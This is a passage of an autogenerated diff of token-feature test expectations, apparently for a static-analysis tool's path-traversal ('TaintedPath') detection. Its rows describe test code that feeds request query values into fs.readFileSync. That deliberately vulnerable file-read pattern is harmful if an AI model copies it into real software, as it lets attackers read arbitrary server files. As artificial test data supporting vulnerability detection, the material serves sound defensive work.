url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | | autogenerated/TaintedPath/TaintedPath.js:202:22:202:25 | "qs" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:202:22:202:25 | "qs" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:5 | res | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:11 | res.write | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:51 | exceptional return of res.wri ... ).foo)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:51 | exceptional return of res.wri ... ).foo)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:51 | exceptional return of res.wri ... ).foo)) | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:51 | exceptional return of res.wri ... ).foo)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:51 | exceptional return of res.wri ... ).foo)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:51 | res.wri ... ).foo)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:51 | res.wri ... ).foo)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:51 | res.wri ... ).foo)) | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:51 | res.wri ... ).foo)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:203:3:203:51 | res.wri ... ).foo)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:203:7:203:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:7:203:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:7:203:11 | write | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:203:7:203:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:203:7:203:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:203:13:203:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:13:203:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:13:203:14 | fs | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:203:13:203:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:203:13:203:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:203:13:203:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:13:203:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:13:203:27 | fs.readFileSync | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:203:13:203:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:203:13:203:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:203:13:203:50 | exceptional return of fs.read ... l).foo) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:13:203:50 | exceptional return of fs.read ... l).foo) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:203:13:203:50 | exceptional return of fs.read ... l).foo) | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:203:13:203:50 | exceptional return of fs.read ... l).foo) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:203:13:203:50 | exceptional return of fs.read ... l).foo) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:203:13:203:50 | fs.read ... l).foo) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:203:13:203:50 | fs.read ... l).foo) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:203:13:203:50 | fs.read ... l).foo) | contextFunctionInterfaces | views_local(req, res) | @@ -6737,6 +66152,31 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:203:13:203:50 | fs.read ... l).foo) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:203:13:203:50 | fs.read ... l).foo) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:203:13:203:50 | fs.read ... l).foo) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:203:16:203:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:16:203:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:16:203:27 | readFileSync | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:203:16:203:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:203:16:203:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:30 | qs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:30 | qs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:30 | qs | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:30 | qs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:30 | qs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:36 | qs.parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:36 | qs.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:36 | qs.parse | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:36 | qs.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:36 | qs.parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:45 | exceptional return of qs.parse(req.url) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:45 | exceptional return of qs.parse(req.url) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:45 | exceptional return of qs.parse(req.url) | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:45 | exceptional return of qs.parse(req.url) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:45 | exceptional return of qs.parse(req.url) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:45 | qs.parse(req.url) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:45 | qs.parse(req.url) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:45 | qs.parse(req.url) | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:45 | qs.parse(req.url) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:203:29:203:45 | qs.parse(req.url) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:203:29:203:49 | qs.pars ... rl).foo | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:203:29:203:49 | qs.pars ... rl).foo | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:203:29:203:49 | qs.pars ... rl).foo | calleeImports | fs | @@ -6746,6 +66186,16 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:203:29:203:49 | qs.pars ... rl).foo | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:203:29:203:49 | qs.pars ... rl).foo | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:203:29:203:49 | qs.pars ... rl).foo | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:203:32:203:36 | parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:32:203:36 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:32:203:36 | parse | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:203:32:203:36 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:203:32:203:36 | parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:203:38:203:40 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:38:203:40 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:38:203:40 | req | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:203:38:203:40 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:203:38:203:40 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:203:38:203:44 | req.url | CalleeFlexibleAccessPath | qs.parse | | autogenerated/TaintedPath/TaintedPath.js:203:38:203:44 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:203:38:203:44 | req.url | calleeImports | qs | @@ -6755,6 +66205,56 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:203:38:203:44 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:203:38:203:44 | req.url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:203:38:203:44 | req.url | receiverName | qs | +| autogenerated/TaintedPath/TaintedPath.js:203:42:203:44 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:42:203:44 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:42:203:44 | url | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:203:42:203:44 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:203:42:203:44 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:203:47:203:49 | foo | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:47:203:49 | foo | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:203:47:203:49 | foo | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:203:47:203:49 | foo | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:203:47:203:49 | foo | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:5 | res | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:11 | res.write | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:65 | exceptional return of res.wri ... ).foo)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:65 | exceptional return of res.wri ... ).foo)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:65 | exceptional return of res.wri ... ).foo)) | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:65 | exceptional return of res.wri ... ).foo)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:65 | exceptional return of res.wri ... ).foo)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:65 | res.wri ... ).foo)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:65 | res.wri ... ).foo)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:65 | res.wri ... ).foo)) | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:65 | res.wri ... ).foo)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:3:204:65 | res.wri ... ).foo)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:204:7:204:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:7:204:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:7:204:11 | write | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:7:204:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:7:204:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:204:13:204:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:13:204:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:13:204:14 | fs | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:13:204:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:13:204:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:204:13:204:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:13:204:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:13:204:27 | fs.readFileSync | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:13:204:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:13:204:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:204:13:204:64 | exceptional return of fs.read ... )).foo) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:13:204:64 | exceptional return of fs.read ... )).foo) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:204:13:204:64 | exceptional return of fs.read ... )).foo) | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:13:204:64 | exceptional return of fs.read ... )).foo) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:13:204:64 | exceptional return of fs.read ... )).foo) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:204:13:204:64 | fs.read ... )).foo) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:204:13:204:64 | fs.read ... )).foo) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:204:13:204:64 | fs.read ... )).foo) | contextFunctionInterfaces | views_local(req, res) | @@ -6763,6 +66263,31 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:204:13:204:64 | fs.read ... )).foo) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:204:13:204:64 | fs.read ... )).foo) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:204:13:204:64 | fs.read ... )).foo) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:204:16:204:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:16:204:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:16:204:27 | readFileSync | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:16:204:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:16:204:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:30 | qs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:30 | qs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:30 | qs | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:30 | qs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:30 | qs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:36 | qs.parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:36 | qs.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:36 | qs.parse | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:36 | qs.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:36 | qs.parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:59 | exceptional return of qs.pars ... q.url)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:59 | exceptional return of qs.pars ... q.url)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:59 | exceptional return of qs.pars ... q.url)) | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:59 | exceptional return of qs.pars ... q.url)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:59 | exceptional return of qs.pars ... q.url)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:59 | qs.pars ... q.url)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:59 | qs.pars ... q.url)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:59 | qs.pars ... q.url)) | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:59 | qs.pars ... q.url)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:29:204:59 | qs.pars ... q.url)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:204:29:204:63 | qs.pars ... l)).foo | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:204:29:204:63 | qs.pars ... l)).foo | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:204:29:204:63 | qs.pars ... l)).foo | calleeImports | fs | @@ -6772,6 +66297,21 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:204:29:204:63 | qs.pars ... l)).foo | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:204:29:204:63 | qs.pars ... l)).foo | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:204:29:204:63 | qs.pars ... l)).foo | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:204:32:204:36 | parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:32:204:36 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:32:204:36 | parse | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:32:204:36 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:204:32:204:36 | parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:204:38:204:49 | normalizeUrl | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:38:204:49 | normalizeUrl | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:204:38:204:49 | normalizeUrl | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:204:38:204:49 | normalizeUrl | enclosingFunctionName | http.createServer#functionalargument | 